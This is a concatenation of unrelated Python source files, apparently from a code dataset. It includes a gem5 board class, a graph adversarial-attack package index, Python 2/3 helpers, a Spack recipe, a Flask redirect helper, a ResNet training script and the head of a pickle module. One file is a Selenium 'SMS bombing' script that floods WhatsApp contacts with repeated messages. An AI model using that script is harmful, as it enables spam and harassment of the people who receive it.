fdt.writeDtbFile(os.path.join(outdir, "device.dtb"))
@overrides(KernelDiskWorkload)
def get_disk_device(self):
return "/dev/vda"
@overrides(KernelDiskWorkload)
def _add_disk_to_board(self, disk_image: AbstractResource):
image = CowDiskImage(
child=RawDiskImage(read_only=True), read_only=False
)
image.child.image_file = disk_image.get_local_path()
self.disk.vio.image = image
# Note: The below is a bit of a hack. We need to wait to generate the
# device tree until after the disk is set up. Now that the disk and
# workload are set, we can generate the device tree file.
self._setup_io_devices()
self._setup_pma()
# Default DTB address if bbl is built with --with-dts option
self.workload.dtb_addr = 0x87E00000
self.generate_device_tree(m5.options.outdir)
self.workload.dtb_filename = os.path.join(
m5.options.outdir, "device.dtb"
)
@overrides(KernelDiskWorkload)
def get_default_kernel_args(self) -> List[str]:
return ["console=ttyS0", "root={root_value}", "ro"]
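# Illustrative sketch (not part of the original board class): how the
# "root={root_value}" template returned by get_default_kernel_args() above is
# typically resolved against the device path reported by get_disk_device().
# The helper name below is hypothetical and exists only for this example.
def _example_format_kernel_args():
    args = ["console=ttyS0", "root={root_value}", "ro"]
    root = "/dev/vda"  # the value get_disk_device() returns above
    # str.format() leaves arguments without the placeholder unchanged
    return " ".join(arg.format(root_value=root) for arg in args)
# _example_format_kernel_args() == "console=ttyS0 root=/dev/vda ro"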
|
py | 7dfa9de8b28a73b095f4d4244b1f1f1a90d9724b | from .attacker import Attacker
from .flip_attacker import FlipAttacker
from . import targeted
from . import untargeted
from . import backdoor
from . import utils
def enabled_models(with_common=True):
"""Return the models in the gallery enabled by the current backend.
Returns
-------
tuple
The models enabled by the current backend.
"""
return targeted.enabled_models(with_common) + untargeted.enabled_models(with_common)
attackers = enabled_models
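# Hedged usage sketch (comment only; the import path is an assumption based on
# this package layout, and with_common is simply forwarded to the targeted and
# untargeted registries above):
#
#   from graphgallery.attack import enabled_models
#   print(enabled_models())                   # attackers usable with the active backend
#   print(enabled_models(with_common=False))  # same query with with_common disabled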
|
py | 7dfa9e4b044419ecf825225eff37acd77ca8c60e | """ This is a temporary module, used during (and for a while after) the
transition to Python 3. This code is planned to be kept in place until
the lowest supported version of Python no longer requires it (and of course
until all callers no longer need it).
This code should run as-is in 2.x and also run unedited after 2to3 in 3.x.
$Id$
"""
from __future__ import division # confidence high
import os, sys
PY3K = sys.version_info[0] > 2
def ndarr2str(arr, encoding='ascii'):
""" This is used to ensure that the return value of arr.tostring()
is actually a string. This will prevent lots of if-checks in calling
code. As of numpy v1.6.1 (in Python 3.2.3), the tostring() function
still returns type 'bytes', not 'str' as it advertises. """
# be fast, don't check - just assume 'arr' is a numpy array - the tostring
# call will fail anyway if not
retval = arr.tostring()
# would rather check "if isinstance(retval, bytes)", but support 2.5.
# could rm the if PY3K check, but it makes this faster on 2.x.
if PY3K and not isinstance(retval, str):
return retval.decode(encoding)
else: # is str
return retval
def ndarr2bytes(arr, encoding='ascii'):
""" This is used to ensure that the return value of arr.tostring()
is actually a *bytes* array in PY3K. See notes in ndarr2str above. Even
though we consider it a bug that numpy's tostring() function returns
a bytes array in PY3K, there are actually many instances where that is what
we want - bytes, not unicode. So we use this function in those
instances to ensure that when/if this numpy "bug" is "fixed", that
our calling code still gets bytes where it needs/expects them. """
# be fast, don't check - just assume 'arr' is a numpy array - the tostring
# call will fail anyway if not
retval = arr.tostring()
# would rather check "if not isinstance(retval, bytes)", but support 2.5.
if PY3K and isinstance(retval, str):
# Take note if this ever gets used. If this ever occurs, it
# is likely wildly inefficient since numpy.tostring() is now
# returning unicode and numpy surely has a tobytes() func by now.
# If so, add a code path to call its tobytes() func at our start.
return retval.encode(encoding)
else: # is str==bytes in 2.x
return retval
def tobytes(s, encoding='ascii'):
""" Convert string s to the 'bytes' type, in all Pythons, even
back before Python 2.6. What 'str' means varies by PY3K or not.
In Pythons before 3.0, this is technically the same as the str type
in terms of the character data in memory. """
# NOTE: after we abandon 2.5, we might simply instead use "bytes(s)"
# NOTE: after we abandon all 2.*, del this and prepend byte strings with 'b'
if PY3K:
if isinstance(s, bytes):
return s
else:
return s.encode(encoding)
else:
# for py2.6 on (before 3.0), bytes is same as str; 2.5 has no bytes
# but handle if unicode is passed
if isinstance(s, unicode):
return s.encode(encoding)
else:
return s
def tostr(s, encoding='ascii'):
""" Convert string-like-thing s to the 'str' type, in all Pythons, even
back before Python 2.6. What 'str' means varies by PY3K or not.
In Pythons before 3.0, str and bytes are the same type.
In Python 3+, this may require a decoding step. """
if PY3K:
if isinstance(s, str): # str == unicode in PY3K
return s
else: # s is type bytes
return s.decode(encoding)
else:
# for py2.6 on (before 3.0), bytes is same as str; 2.5 has no bytes
# but handle if unicode is passed
if isinstance(s, unicode):
return s.encode(encoding)
else:
return s
try:
BNULLSTR = tobytes('') # after dropping 2.5, change to: b''
BNEWLINE = tobytes('\n') # after dropping 2.5, change to: b'\n'
except:
BNULLSTR = ''
BNEWLINE = '\n'
def bytes_read(fd, sz):
""" Perform an os.read in a way that can handle both Python2 and Python3
IO. Assume we are always piping only ASCII characters (since that is all
we have ever done with IRAF). Either way, return the data as bytes.
"""
# return tobytes(os.read(fd, sz))
return os.read(fd, sz) # already returns str in Py2.x and bytes in PY3K
def bytes_write(fd, bufstr):
""" Perform an os.write in a way that can handle both Python2 and Python3
IO. Assume we are always piping only ASCII characters (since that is all
we have ever done with IRAF). Either way, write the binary data to fd.
"""
return os.write(fd, tobytes(bufstr))
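# Minimal usage sketch (illustrative, not part of the original module): the
# helpers above round-trip text between bytes and the native str type on both
# Python lines. The function name is hypothetical and is never called here.
def _example_roundtrip():
    b = tobytes('abc')   # bytes on PY3K, str (== bytes) on 2.x
    s = tostr(b)         # back to the native str type
    return s == 'abc' and tobytes(s) == b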
|
py | 7dfa9edda555cb3aedfa6633bdf1279562a02448 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Filebench(AutotoolsPackage):
"""
Filebench is a file system and storage benchmark that can generate a
large variety of workloads. Unlike typical benchmarks it is extremely
flexible and allows specifying an application's I/O behavior using its
extensive Workload Model Language (WML). Users can either describe
desired workloads from scratch or use (with or without modifications)
workload personalities shipped with Filebench (e.g., mail-, web-, file-,
and database-server workloads). Filebench is equally good for micro
and macro-benchmarking, quick to set up, and relatively easy to use.
"""
homepage = "https://github.com/filebench/filebench"
url = "https://github.com/filebench/filebench/archive/1.4.9.1.tar.gz"
version('1.4.9.1', sha256='77ae91b83c828ded1219550aec74fbbd6975dce02cb5ab13c3b99ac2154e5c2e')
version('1.4.9', sha256='61b8a838c1450b51a4ce61481a19a1bf0d6e3993180c524ff4051f7c18bd9c6a')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('flex', type='build')
depends_on('bison', type='build')
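# Hedged usage note (illustrative, not part of the recipe): with this package
# file available in a Spack repository, the benchmark would normally be built
# and made available through the standard workflow, e.g.
#
#   spack install filebench@1.4.9.1
#   spack load filebench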
|
py | 7dfa9f018608d6a11e3e4afd22be50c20ae14e7d | # -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li <[email protected]>
:license: MIT, see LICENSE for more details.
"""
try:
from urlparse import urlparse, urljoin
except ImportError:
from urllib.parse import urlparse, urljoin
from flask import request, redirect, url_for
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def redirect_back(default='blog.index', **kwargs):
for target in request.args.get('next'), request.referrer:
if not target:
continue
if is_safe_url(target):
return redirect(target)
return redirect(url_for(default, **kwargs))
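# Hedged usage sketch (illustrative, not part of the original module): a
# hypothetical view body showing how redirect_back() is typically used; it is
# defined only for illustration and never registered as a route here.
def _example_view():
    # After handling a POST, send the user back to where they came from.
    # redirect_back() honours request.args['next'] / request.referrer only
    # when is_safe_url() accepts them, otherwise it falls back to 'blog.index'.
    return redirect_back(default='blog.index')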
|
py | 7dfa9f175fc34d11c6c07622e1bf31ebdca4963c | # Coder: Wenxin Xu
# Github: https://github.com/wenxinxu/resnet_in_tensorflow
# ==============================================================================
from resnet import *
from datetime import datetime
import time
from cifar10_input import *
import pandas as pd
from hardware_estimation import hardware_estimation
import pickle
import tensorflow.contrib.slim as slim
from pathlib import Path
class_num = 10
image_size = 32
img_channels = 3
class Train(object):
'''
This object is responsible for the whole training and validation process
'''
def __init__(self):
# Set up all the placeholders
self.placeholders()
def placeholders(self):
'''
There are five placeholders in total.
image_placeholder and label_placeholder are for train images and labels
vali_image_placeholder and vali_label_placeholder are for validation images and labels
lr_placeholder is for the learning rate. Feeding in the learning rate at each training
step makes it easy to implement learning rate decay
'''
self.image_placeholder = tf.placeholder(dtype=tf.float32,
shape=[FLAGS.train_batch_size, IMG_HEIGHT,
IMG_WIDTH, IMG_DEPTH])
self.label_placeholder = tf.placeholder(dtype=tf.int32, shape=[FLAGS.train_batch_size])
self.vali_image_placeholder = tf.placeholder(dtype=tf.float32, shape=[FLAGS.validation_batch_size,
IMG_HEIGHT, IMG_WIDTH, IMG_DEPTH])
self.vali_label_placeholder = tf.placeholder(dtype=tf.int32, shape=[FLAGS.validation_batch_size])
self.lr_placeholder = tf.placeholder(dtype=tf.float32, shape=[])
def build_train_validation_graph(self):
'''
This function builds the train graph and validation graph at the same time.
'''
_input_array= []
_weights = []
global_step = tf.Variable(0, trainable=False)
validation_step = tf.Variable(0, trainable=False)
# Logits of training data and validation data come from the same graph. The inference of
# validation data share all the weights with train data. This is implemented by passing
# reuse=True to the variable scopes of train graph
logits,_input_array,_weights = inference(self.image_placeholder, FLAGS.num_residual_blocks, reuse=False)
vali_logits,_input_array,_weights = inference(self.vali_image_placeholder, FLAGS.num_residual_blocks, reuse=True)
# The following code calculates the train loss, which consists of the
# softmax cross entropy and the regularization loss
regu_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
loss = self.loss(logits, self.label_placeholder)
self.full_loss = tf.add_n([loss] + regu_losses)
predictions = tf.nn.softmax(logits)
self.train_top1_error = self.top_k_error(predictions, self.label_placeholder, 1)
# Validation loss
self.vali_loss = self.loss(vali_logits, self.vali_label_placeholder)
vali_predictions = tf.nn.softmax(vali_logits)
self.vali_top1_error = self.top_k_error(vali_predictions, self.vali_label_placeholder, 1)
self.train_op, self.train_ema_op = self.train_operation(global_step, self.full_loss,
self.train_top1_error)
self.val_op = self.validation_op(validation_step, self.vali_top1_error, self.vali_loss)
def train(self):
'''
This is the main function for training
'''
# For the first step, we are loading all training images and validation images into the
# memory
all_data, all_labels = prepare_train_data(padding_size=FLAGS.padding_size)
vali_data, vali_labels = read_validation_data()
# Build the graph for train and validation
self.build_train_validation_graph()
# Initialize a saver to save checkpoints. Merge all summaries, so we can run all
# summarizing operations by running summary_op. Initialize a new session
saver = tf.train.Saver(tf.global_variables())
summary_op = tf.summary.merge_all()
init = tf.initialize_all_variables()
sess = tf.Session()
# If you want to load from a checkpoint
if FLAGS.is_use_ckpt is True:
saver.restore(sess, FLAGS.ckpt_path)
print ('Restored from checkpoint...')
else:
sess.run(init)
# This summary writer object helps write summaries on tensorboard
summary_writer = tf.summary.FileWriter(train_dir, sess.graph)
# These lists are used to save a csv file at last
step_list = []
train_error_list = []
val_error_list = []
print ('Start training...')
print ('----------------------------')
for step in range(FLAGS.train_steps):
train_batch_data, train_batch_labels = self.generate_augment_train_batch(all_data, all_labels,
FLAGS.train_batch_size)
validation_batch_data, validation_batch_labels = self.generate_vali_batch(vali_data,
vali_labels, FLAGS.validation_batch_size)
# Want to validate once before training. You may check the theoretical validation
# loss first
if step % FLAGS.report_freq == 0:
if FLAGS.is_full_validation is True:
validation_loss_value, validation_error_value = self.full_validation(loss=self.vali_loss,
top1_error=self.vali_top1_error, vali_data=vali_data,
vali_labels=vali_labels, session=sess,
batch_data=train_batch_data, batch_label=train_batch_labels)
vali_summ = tf.Summary()
vali_summ.value.add(tag='full_validation_error',
simple_value=validation_error_value.astype(np.float))
summary_writer.add_summary(vali_summ, step)
summary_writer.flush()
else:
_, validation_error_value, validation_loss_value = sess.run([self.val_op,
self.vali_top1_error,
self.vali_loss],
{self.image_placeholder: train_batch_data,
self.label_placeholder: train_batch_labels,
self.vali_image_placeholder: validation_batch_data,
self.vali_label_placeholder: validation_batch_labels,
self.lr_placeholder: FLAGS.init_lr})
val_error_list.append(validation_error_value)
start_time = time.time()
_, _, train_loss_value, train_error_value = sess.run([self.train_op, self.train_ema_op,
self.full_loss, self.train_top1_error],
{self.image_placeholder: train_batch_data,
self.label_placeholder: train_batch_labels,
self.vali_image_placeholder: validation_batch_data,
self.vali_label_placeholder: validation_batch_labels,
self.lr_placeholder: FLAGS.init_lr})
duration = time.time() - start_time
if step % FLAGS.report_freq == 0:
summary_str = sess.run(summary_op, {self.image_placeholder: train_batch_data,
self.label_placeholder: train_batch_labels,
self.vali_image_placeholder: validation_batch_data,
self.vali_label_placeholder: validation_batch_labels,
self.lr_placeholder: FLAGS.init_lr})
summary_writer.add_summary(summary_str, step)
num_examples_per_step = FLAGS.train_batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.4f (%.1f examples/sec; %.3f ' 'sec/batch)')
print (format_str % (datetime.now(), step, train_loss_value, examples_per_sec,
sec_per_batch))
print ('Train top1 error = ', train_error_value)
print ('Validation top1 error = %.4f' % validation_error_value)
print ('Validation loss = ', validation_loss_value)
print ('----------------------------')
step_list.append(step)
train_error_list.append(train_error_value)
if step == FLAGS.decay_step0 or step == FLAGS.decay_step1:
FLAGS.init_lr = 0.1 * FLAGS.init_lr
print ('Learning rate decayed to ', FLAGS.init_lr)
# Save checkpoints every 10000 steps
if step % 10000 == 0 or (step + 1) == FLAGS.train_steps:
checkpoint_path = os.path.join(train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
df = pd.DataFrame(data={'step':step_list, 'train_error':train_error_list,
'validation_error': val_error_list})
df.to_csv(train_dir + FLAGS.version + '_error.csv')
def test(self, test_image_array):
'''
This function is used to evaluate the test data. Please finish pre-processing in advance
:param test_image_array: 4D numpy array with shape [num_test_images, img_height, img_width,
img_depth]
:return: the softmax probability with shape [num_test_images, num_labels]
'''
_input_array= []
_weights = []
num_test_images = len(test_image_array)
num_batches = num_test_images // FLAGS.test_batch_size
remain_images = num_test_images % FLAGS.test_batch_size
print ('%i test batches in total...' %num_batches)
# Create the test image and labels placeholders
self.test_image_placeholder = tf.placeholder(dtype=tf.float32, shape=[FLAGS.test_batch_size,
IMG_HEIGHT, IMG_WIDTH, IMG_DEPTH])
# Build the test graph
logits, _input_array, _weights = inference(self.test_image_placeholder, FLAGS.num_residual_blocks, reuse=False)
count=1
for i in _input_array:
print("The act shape for layer %d is" %(count), i.shape)
count+=1
predictions = tf.nn.softmax(logits)
# Initialize a new session and restore a checkpoint
saver = tf.train.Saver(tf.all_variables())
sess = tf.Session()
saver.restore(sess, FLAGS.test_ckpt_path)
print ('Model restored from ', FLAGS.test_ckpt_path)
prediction_array = np.array([]).reshape(-1, NUM_CLASS)
# Test by batches
for step in range(num_batches):
if step % 10 == 0:
print ('%i batches finished!' %step)
offset = step * FLAGS.test_batch_size
test_image_batch = test_image_array[offset:offset+FLAGS.test_batch_size, ...]
batch_prediction_array = sess.run(predictions,
feed_dict={self.test_image_placeholder: test_image_batch})
prediction_array = np.concatenate((prediction_array, batch_prediction_array))
# If test_batch_size is not a divisor of num_test_images
if remain_images != 0:
self.test_image_placeholder = tf.placeholder(dtype=tf.float32, shape=[remain_images,
IMG_HEIGHT, IMG_WIDTH, IMG_DEPTH])
# Build the test graph
logits = inference(self.test_image_placeholder, FLAGS.num_residual_blocks, reuse=True)
predictions = tf.nn.softmax(logits)
test_image_batch = test_image_array[-remain_images:, ...]
batch_prediction_array = sess.run(predictions, feed_dict={
self.test_image_placeholder: test_image_batch})
prediction_array = np.concatenate((prediction_array, batch_prediction_array))
#count=0
#for i in _input_array:
# count+=1
# print("The size of the input to layer %d is"%(count),sess.run(tf.shape(i)))
#count=0
#for i in _weights:
# count+=1
# print("The size of the weights of layer %d is"%(count),sess.run(tf.shape(i)))
feed_dict={self.test_image_placeholder: test_image_batch}
H, W = sess.run([_input_array, _weights], feed_dict=feed_dict)
for i in W:
print(i.shape)
my_file = Path("./to_interconnect/ip_activation.csv")
if my_file.is_file():
os.remove("./to_interconnect/ip_activation.csv")
my_file_1 = Path("./to_interconnect/num_tiles_per_layer.csv")
if my_file_1.is_file():
os.remove("./to_interconnect/num_tiles_per_layer.csv")
my_file_2 = Path("./to_interconnect/fps.csv")
if my_file_2.is_file():
os.remove("./to_interconnect/fps.csv")
my_file_3 = Path("./Final_Results/area.csv")
if my_file_3.is_file():
os.remove("./Final_Results/area.csv")
my_file_4 = Path("./Final_Results/Latency.csv")
if my_file_4.is_file():
os.remove("./Final_Results/Latency.csv")
my_file_5 = Path("./Final_Results/Energy.csv")
if my_file_5.is_file():
os.remove("./Final_Results/Energy.csv")
hardware_estimation(H,W,8,8)
return prediction_array
def unpickle(self,file):
with open(file, 'rb') as fo:
dict = pickle.load(fo, encoding='bytes')
return dict
def load_data_one(self,file):
class_num = 10
image_size = 32
img_channels = 3
batch = self.unpickle(file)
data = batch[b'data']
labels = batch[b'labels']
print("Loading %s : %d." %(file, len(data)))
return data, labels
def load_data(self,files, data_dir, label_count):
global image_size, img_channels
data, labels = self.load_data_one(data_dir + '/' + files[0])
for f in files[1:]:
data_n, labels_n = self.load_data_one(data_dir + '/' + f)
data = np.append(data,data_n,axis=0)
labels = np.append(labels,labels_n,axis=0)
labels = np.array( [ [ float( i == label ) for i in range(label_count) ] for label in labels ] )
data = data.reshape([-1,img_channels, image_size, image_size])
data = data.transpose([0, 2, 3, 1])
return data, labels
def prepare_data(self):
class_num = 10
image_size = 32
img_channels = 3
print("======Loading data======")
#download_data()
data_dir = './cifar10_data/cifar-10-batches-py'
image_dim = image_size * image_size * img_channels
meta = self.unpickle( data_dir + '/batches.meta')
label_names = meta[b'label_names']
label_count = len(label_names)
train_files = [ 'data_batch_%d' % d for d in range(1,6) ]
train_data, train_labels = self.load_data(train_files, data_dir, label_count)
test_data, test_labels = self.load_data([ 'test_batch' ], data_dir, label_count)
print("Train data:",np.shape(train_data), np.shape(train_labels))
print("Test data :",np.shape(test_data), np.shape(test_labels))
print("======Load finished======")
print("======Shuffling data======")
indices = np.random.permutation(len(train_data))
train_data = train_data[indices]
train_labels = train_labels[indices]
print("======Prepare Finished======")
return train_data, train_labels, test_data, test_labels
def data_preprocessing(self, x_train,x_test):
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train[:,:,:,0] = (x_train[:,:,:,0] - np.mean(x_train[:,:,:,0])) / np.std(x_train[:,:,:,0])
x_train[:,:,:,1] = (x_train[:,:,:,1] - np.mean(x_train[:,:,:,1])) / np.std(x_train[:,:,:,1])
x_train[:,:,:,2] = (x_train[:,:,:,2] - np.mean(x_train[:,:,:,2])) / np.std(x_train[:,:,:,2])
x_test[:,:,:,0] = (x_test[:,:,:,0] - np.mean(x_test[:,:,:,0])) / np.std(x_test[:,:,:,0])
x_test[:,:,:,1] = (x_test[:,:,:,1] - np.mean(x_test[:,:,:,1])) / np.std(x_test[:,:,:,1])
x_test[:,:,:,2] = (x_test[:,:,:,2] - np.mean(x_test[:,:,:,2])) / np.std(x_test[:,:,:,2])
return x_train, x_test
def test_NSim(self):
train_x, train_y, test_x, test_y = self.prepare_data()
train_x, test_x = self.data_preprocessing(train_x, test_x)
self.test(test_x)
## Helper functions
def loss(self, logits, labels):
'''
Calculate the cross entropy loss given logits and true labels
:param logits: 2D tensor with shape [batch_size, num_labels]
:param labels: 1D tensor with shape [batch_size]
:return: loss tensor with shape [1]
'''
labels = tf.cast(labels, tf.int64)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,
labels=labels, name='cross_entropy_per_example')
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')
return cross_entropy_mean
def top_k_error(self, predictions, labels, k):
'''
Calculate the top-k error
:param predictions: 2D tensor with shape [batch_size, num_labels]
:param labels: 1D tensor with shape [batch_size, 1]
:param k: int
:return: tensor with shape [1]
'''
batch_size = predictions.get_shape().as_list()[0]
in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))
num_correct = tf.reduce_sum(in_top1)
return (batch_size - num_correct) / float(batch_size)
def generate_vali_batch(self, vali_data, vali_label, vali_batch_size):
'''
If you want to use a random batch of validation data to validate instead of using the
whole validation data, this function helps you generate that batch
:param vali_data: 4D numpy array
:param vali_label: 1D numpy array
:param vali_batch_size: int
:return: 4D numpy array and 1D numpy array
'''
offset = np.random.choice(10000 - vali_batch_size, 1)[0]
vali_data_batch = vali_data[offset:offset+vali_batch_size, ...]
vali_label_batch = vali_label[offset:offset+vali_batch_size]
return vali_data_batch, vali_label_batch
def generate_augment_train_batch(self, train_data, train_labels, train_batch_size):
'''
This function helps generate a batch of train data, and randomly crop, horizontally flip
and whiten them at the same time
:param train_data: 4D numpy array
:param train_labels: 1D numpy array
:param train_batch_size: int
:return: augmented train batch data and labels. 4D numpy array and 1D numpy array
'''
offset = np.random.choice(EPOCH_SIZE - train_batch_size, 1)[0]
batch_data = train_data[offset:offset+train_batch_size, ...]
batch_data = random_crop_and_flip(batch_data, padding_size=FLAGS.padding_size)
batch_data = whitening_image(batch_data)
batch_label = train_labels[offset:offset+FLAGS.train_batch_size]
return batch_data, batch_label
def train_operation(self, global_step, total_loss, top1_error):
'''
Defines train operations
:param global_step: tensor variable with shape [1]
:param total_loss: tensor with shape [1]
:param top1_error: tensor with shape [1]
:return: two operations. Running train_op will do optimization once. Running train_ema_op
will generate the moving average of train error and train loss for tensorboard
'''
# Add train_loss, current learning rate and train error into the tensorboard summary ops
tf.summary.scalar('learning_rate', self.lr_placeholder)
tf.summary.scalar('train_loss', total_loss)
tf.summary.scalar('train_top1_error', top1_error)
# The ema object helps calculate the moving average of train loss and train error
ema = tf.train.ExponentialMovingAverage(FLAGS.train_ema_decay, global_step)
train_ema_op = ema.apply([total_loss, top1_error])
tf.summary.scalar('train_top1_error_avg', ema.average(top1_error))
tf.summary.scalar('train_loss_avg', ema.average(total_loss))
opt = tf.train.MomentumOptimizer(learning_rate=self.lr_placeholder, momentum=0.9)
train_op = opt.minimize(total_loss, global_step=global_step)
return train_op, train_ema_op
def validation_op(self, validation_step, top1_error, loss):
'''
Defines validation operations
:param validation_step: tensor with shape [1]
:param top1_error: tensor with shape [1]
:param loss: tensor with shape [1]
:return: validation operation
'''
# This ema object helps calculate the moving average of validation loss and error
# ema with decay = 0.0 won't average things at all. This returns the original error
ema = tf.train.ExponentialMovingAverage(0.0, validation_step)
ema2 = tf.train.ExponentialMovingAverage(0.95, validation_step)
val_op = tf.group(validation_step.assign_add(1), ema.apply([top1_error, loss]),
ema2.apply([top1_error, loss]))
top1_error_val = ema.average(top1_error)
top1_error_avg = ema2.average(top1_error)
loss_val = ema.average(loss)
loss_val_avg = ema2.average(loss)
# Summarize these values on tensorboard
tf.summary.scalar('val_top1_error', top1_error_val)
tf.summary.scalar('val_top1_error_avg', top1_error_avg)
tf.summary.scalar('val_loss', loss_val)
tf.summary.scalar('val_loss_avg', loss_val_avg)
return val_op
def full_validation(self, loss, top1_error, session, vali_data, vali_labels, batch_data,
batch_label):
'''
Runs validation on all the 10000 validation images
:param loss: tensor with shape [1]
:param top1_error: tensor with shape [1]
:param session: the current tensorflow session
:param vali_data: 4D numpy array
:param vali_labels: 1D numpy array
:param batch_data: 4D numpy array. training batch to feed dict and fetch the weights
:param batch_label: 1D numpy array. training labels to feed the dict
:return: float, float
'''
num_batches = 10000 // FLAGS.validation_batch_size
order = np.random.choice(10000, num_batches * FLAGS.validation_batch_size)
vali_data_subset = vali_data[order, ...]
vali_labels_subset = vali_labels[order]
loss_list = []
error_list = []
for step in range(num_batches):
offset = step * FLAGS.validation_batch_size
feed_dict = {self.image_placeholder: batch_data, self.label_placeholder: batch_label,
self.vali_image_placeholder: vali_data_subset[offset:offset+FLAGS.validation_batch_size, ...],
self.vali_label_placeholder: vali_labels_subset[offset:offset+FLAGS.validation_batch_size],
self.lr_placeholder: FLAGS.init_lr}
loss_value, top1_error_value = session.run([loss, top1_error], feed_dict=feed_dict)
loss_list.append(loss_value)
error_list.append(top1_error_value)
return np.mean(loss_list), np.mean(error_list)
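# Illustrative sketch (not used by the training code above): a NumPy version of
# the top-1 error that Train.top_k_error() computes with tf.nn.in_top_k. The
# helper name is hypothetical and exists only for this example.
def _np_top1_error(predictions, labels):
    import numpy as np  # np is also used elsewhere in this file via the star imports
    top1 = np.argmax(predictions, axis=1)  # predicted class id per example
    return float(np.mean(top1 != labels))  # fraction of wrong predictions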
if __name__ == "__main__":
maybe_download_and_extract()
# Initialize the Train object
train = Train()
# Start the training session
# train.train()
train.test_NSim()
|
py | 7dfaa1f7b82a03c761d072d9abc4f83c16f75161 | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import mycontacts
import tkinter as tk
from tkinter import *
import xpath
import time
# Function checking whether the given user exists in the user's whatsapp contact list
def checkuser(str):
try:
driver.find_element_by_xpath(str)
except NoSuchElementException:
return False
return True
# Taking all the Credentials from the user
contact_name = []
print(
"\n\nEnter the name of the contact you want to send message to (Type 'ALL' if you want to send message to all your contacts: )"
)
print(
R"For multiple contacts use newline and type 'stop' at the end to stop adding contacts: "
)
while 1:
a = input()
if a == "stop":
break
contact_name.append(a)
print("Enter the message you want to send:- ", end=" ")
message = input()
print(
"Enter the number of times you want to bomb the message to your contact: ", end=" "
)
count_message = int(input())
# defining the driver for the chrome
driver = webdriver.Chrome()
d1 = driver.get("https://web.whatsapp.com/")
driver.maximize_window()
time.sleep(10)
# If the user chooses ALL then the message will be sent to all the contacts added in mycontacts.py
if "ALL" in contact_name:
for contact in mycontacts.my_contacts:
# locating the chat icon using xpath
chat = driver.find_element_by_xpath(xpath.newchat_xpath)
chat.click()
# locating the search box using xpath and adding the contact to search
search = driver.find_element_by_xpath(xpath.search_xpath)
search.send_keys(contact)
time.sleep(1)
# Checking whether the contact exists or not
if checkuser("//span[@title='{}']".format(contact)) == False:
continue
# Searching the contact and clicking on it
find_user = driver.find_element_by_xpath("//span[@title='{}']".format(contact))
find_user.click()
time.sleep(1)
# Finding the box to type the message and clicking on it
find_message = driver.find_element_by_xpath(xpath.message_xpath)
find_message.click()
time.sleep(1)
# Sending the messages on the basis of count given by the user
for i in range(count_message):
find_message.send_keys(message)
driver.find_element_by_xpath(xpath.sendbutton_xpath).click()
time.sleep(0.5)
time.sleep(1)
# Else the messages will be sent to the users mentioned in the input
else:
for contact in contact_name:
chat = driver.find_element_by_xpath(xpath.newchat_xpath)
chat.click()
search = driver.find_element_by_xpath(xpath.search_xpath)
search.send_keys(contact)
time.sleep(1)
if checkuser("//span[@title='{}']".format(contact)) == False:
continue
find_user = driver.find_element_by_xpath("//span[@title='{}']".format(contact))
find_user.click()
time.sleep(1)
find_message = driver.find_element_by_xpath(xpath.message_xpath)
find_message.click()
time.sleep(1)
for i in range(count_message):
find_message.send_keys(message)
driver.find_element_by_xpath(xpath.sendbutton_xpath).click()
time.sleep(0.5)
time.sleep(1)
print("Sms Bombing Completed...!!!!")
|
py | 7dfaa24f9ffbd55b9ee43d1eff81c92f7804c26c | """Create portable serialized representations of Python objects.
See module copyreg for a mechanism for registering custom picklers.
See module pickletools source for extensive comments.
Classes:
Pickler
Unpickler
Functions:
dump(object, file)
dumps(object) -> string
load(file) -> object
loads(string) -> object
Misc variables:
__version__
format_version
compatible_formats
"""
#
# Copyright 2019 The Eggroll Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from types import FunctionType
from copyreg import dispatch_table
from copyreg import _extension_registry, _inverted_registry, _extension_cache
from itertools import islice
from functools import partial
import sys
from sys import maxsize
from struct import pack, unpack
import re
import io
import codecs
import _compat_pickle
__all__ = ["PickleError", "PicklingError", "UnpicklingError", "Pickler",
"Unpickler", "dump", "dumps", "load", "loads"]
# Shortcut for use in isinstance testing
bytes_types = (bytes, bytearray)
# These are purely informational; no code uses these.
format_version = "4.0" # File format version we write
compatible_formats = ["1.0", # Original protocol 0
"1.1", # Protocol 0 with INST added
"1.2", # Original protocol 1
"1.3", # Protocol 1 with BINFLOAT added
"2.0", # Protocol 2
"3.0", # Protocol 3
"4.0", # Protocol 4
] # Old format versions we can read
# This is the highest protocol number we know how to read.
HIGHEST_PROTOCOL = 4
# The protocol we write by default. May be less than HIGHEST_PROTOCOL.
# We intentionally write a protocol that Python 2.x cannot read;
# there are too many issues with that.
DEFAULT_PROTOCOL = 3
class PickleError(Exception):
"""A utils base class for the other pickling exceptions."""
pass
class PicklingError(PickleError):
"""This exception is raised when an unpicklable object is passed to the
dump() method.
"""
pass
class UnpicklingError(PickleError):
"""This exception is raised when there is a problem unpickling an object,
such as a security violation.
Note that other exceptions may also be raised during unpickling, including
(but not necessarily limited to) AttributeError, EOFError, ImportError,
and IndexError.
"""
pass
# An instance of _Stop is raised by Unpickler.load_stop() in response to
# the STOP opcode, passing the object that is the result of unpickling.
